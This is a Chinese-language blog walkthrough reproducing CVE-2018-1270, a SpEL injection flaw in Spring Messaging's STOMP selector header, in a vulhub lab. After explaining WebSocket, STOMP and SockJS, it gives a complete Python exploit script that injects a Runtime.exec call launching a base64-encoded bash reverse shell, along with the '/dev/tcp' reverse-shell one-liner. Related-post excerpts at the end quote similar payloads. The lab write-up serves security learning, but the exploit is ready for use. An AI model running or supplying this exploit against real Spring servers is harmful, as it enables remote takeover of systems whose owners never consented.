vulhub复现之spring-messaging远程代码执行漏洞CVE-2018-1270)复现

最新推荐文章于 2024-07-24 14:39:27 发布
最新推荐文章于 2024-07-24 14:39:27 发布
阅读量1.5k 收藏
点赞数
分类专栏: vulhub复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70483044/article/details/125805833
版权

学习时间2022.7.15!

spring-messaging

spring-messaging模块为集成messaging api和消息协议提供支持。

spring框架中通过spring-messaging模块实现STOMP(Simple Text-Orientated Messaging Protocal)-面向消息的简单文本协议.STOMP是一种封装WebSocket连接并发一条消息造成远程代码执行。STOMP为浏览器和服务器之间的通信增加适当的消息语义。

创建好环境我们看一下页面

 WebSocket

WebSocket是一种数据通信协议,用于客户端和服务端数据通信。类似于http。

为啥有了http协议还需要webscket协议咧?

 http通信是单向的 请求+响应 没有请求就没有响应

http协议通信只能由客户端发起 http协议无法做到服务端主动向客户端推送消息。这样子的话如果服务器有连续的状态变化,客户端就得一直询问了解。

然后就有了WebScoket!

服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送消息。是真正的双向平等对话。

http和webscoket的区别:

http我问你答

webscoket双向对话

通信模型

拨号(建立连接)

通话(双向通信)

结束通话(关闭连接)

STOMP

STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。
 

SockJS

一个JavaScript库,它在浏览器和Web服务器之间创建了一个低延迟、全双工、跨域通信通道。另外由于WebSocket是HTML5新增的特性,一些浏览器可能不支持,因此回退机制就很必要。SockJS就提供了该功能,即优先使用WebSocket,当浏览器不支持WebSocket时,会自动降为轮询或其他方式。

连接后端服务器流程:

1.用STOMP协议将数据流组合成一个文本流

2.用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket或者http与后端通信。

漏洞原因

Spring框架中的 spring-messaging 模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行。

订阅的时候插入spel表达式-向此订阅发送消息-触发命令执行
1.客户端连接进行握手,握手成功websocket连接建立,STOMP消息帧在此连接上传输。

2.客户端发送消息进行消息订阅,消息被发送然后路由到存储客户端订阅的消息代理。

3.然后经过其他操作被消息代理处理。消息代理寻找所有匹配的订阅者向订阅者发回消息。就是在这个过程会根据客户端发送的SUBSCRIBE进行消息订阅时添加的selector请求头进行过滤(过滤的是订阅者想要的信息)。

漏洞出现在这儿,如果订阅的时候发送的subscribe帧包含selector请求头,那么这里就会对selector请求头的值进行spel表达式求值。那么我只要在这儿插入恶意spel表达式就可以执行我的命令从而进行攻击。

漏洞验证

访问http://your-ip:8080/gs-guide-websocket出现如下

 

漏洞复现反弹shell

直接用exp进行反弹shell

先开启监听端口9002

exp:

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
    
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://靶机ip:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,你的攻击机ip+端口base64编码}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

bash -i >& /dev/tcp/你的攻击机ip/9002 0>&1

这个进行base64编码

然后在服务器python3 exp.py

反弹成功!

 

 

小杜不饿
关注
专栏目录
复现CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 772
一、漏洞概述 spring messagingspring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞复现 发现页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
漏洞复现Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1344
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
spring-messaging远程代码执行漏洞CVE-2018-1270复现
玄道的网安博客
01-07 1534
漏洞概述 Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条消息造成远程代码执行 影响版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 环境搭建 拉取环境 docker ...
Spring-Messaging远程代码执行漏洞CVE-2018-1270
m0_65150886的博客
12-27 1303
'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
Spring Messaging 远程命令执行漏洞 CVE-2018-1270 检测脚本
最新发布
liangjiao_shou的博客
07-24 129
spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞Spring messagingspring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,Spring Messaging 远程命令执行漏洞 CVE-2018-1270 检测脚本。
Spring-Messaging远程代码执行漏洞复现CVE-2018-1270
qq_59741143的博客
08-16 970
Spring-Messaging远程代码执行漏洞复现CVE-2018-1270Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条SpEL表达式消息造成远程代码执行。...
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8363
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
vulhub-Spring Messaging 远程命令执行漏洞CVE-2018-1270
weixin_42513429的博客
08-20 497
https://vulhub.org/#/environments/spring/CVE-2018-1270/ 根据官方的说法,应用的场景各不相同,官方的exp代码还是很容易看懂的 1、基础地址,在vulhub中为http://your-ip:8080/gs-guide-websocket 2、待执行的SpEL表达式,如T(java.lang.Runtime).getRuntime().exec('touch /tmp/success') 3、某一个订阅的地址,如vulhub中为:/topic/gree.
利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)
JiangBuLiu的博客
07-11 2276
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现生成序列化字符串发送数据包,执行命令检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/ 漏洞原理 参考阅读 https://blogs.securiteam.com/...
[JAVA安全]Spring MessagingCVE-2018-1270
snowlyzz的博客
02-19 904
SpEL注入漏洞
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2026
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
vulhubCVE-2020-14882 WebLogic远程代码执行漏洞
weixin_42884199的博客
12-09 2193
前言 远程代码执行漏洞CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。 一、启动靶机 在这里插入代码片 在这里插入代码片 二、漏洞利用 靶机搭建成功 http://192.168.150.146:7001/console/login/LoginForm.j
vulhub靶场php环境下的CVE-2019-11043(PHP远程代码执行漏洞
m0_73248913的博客
02-17 279
vulhub靶场php环境下的CVE-2019-11043(PHP远程代码执行漏洞
vulhubSpring Messaging 远程命令执行漏洞CVE-2018-1270漏洞验证与getshell
qq_45300786的博客
08-01 782
利用条件 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版本仍然受影响 详细过程请看 Spring Messaging 远程命令执行漏洞CVE-2018-1270) 对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符) bash -i >& /dev/tcp/192.168.100.23/9090 0>&a
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5854
CVE-2018-1270-Spring Messaging RCE漏洞复现
记一次曲折的CVE-2018-1270复现分析
蚁景网安学院
04-02 2683
前两天接到朋友对某个授权目标的漏扫结果,也算是初次接触到这个漏洞,就想着顺手分析一下复现一下,因为分析这个漏洞的文章也比较少,所以刚开始比较迷,进度也比较慢。
Spring RCE漏洞分析1(CVE-2018-1270
hldfight
05-04 8259
0x00 前言 趁着五一休息,分析了一下Spring的历史漏洞,这里记录一下对Spring-Messaging远程代码执行漏洞CVE-2018-1270)的分析。该漏洞涉及到如下概念: 1、WebSocket协议,是HTML5提供的一种可在单个TCP连接上进行全双工通讯的协议。即允许服务端主动向客户端推送数据,详情可以参考这里,讲的挺好的。 2、SockJS,一个JavaScript库,它在浏览...
Spring Messaging 远程命令执行漏洞CVE-2018-1270)——漏洞复现
weixin_42090431的博客
11-28 242
2. 用[sockjs协议](https://github.com/sockjs/sockjs-client)发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信。在vulhub中,我们向`/app/hello`发送一个包含name的json,即可触发这个事件。2. 待执行的SpEL表达式,如`T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`根据你自己的需求修改POC。
【网络安全Spring框架漏洞总结(二)
qq_44005305的博客
01-06 720
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行
org.springframework:spring-messaging:5.3.18 依赖
05-20
这是 Spring Framework 5.3.18 中的一个 Maven 依赖项,它提供了对 Spring Messaging 模块的支持。Spring Messaging 提供了基于消息的应用程序的支持,包括支持 STOMP(简单文本定向消息协议)和 WebSocket。它还...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值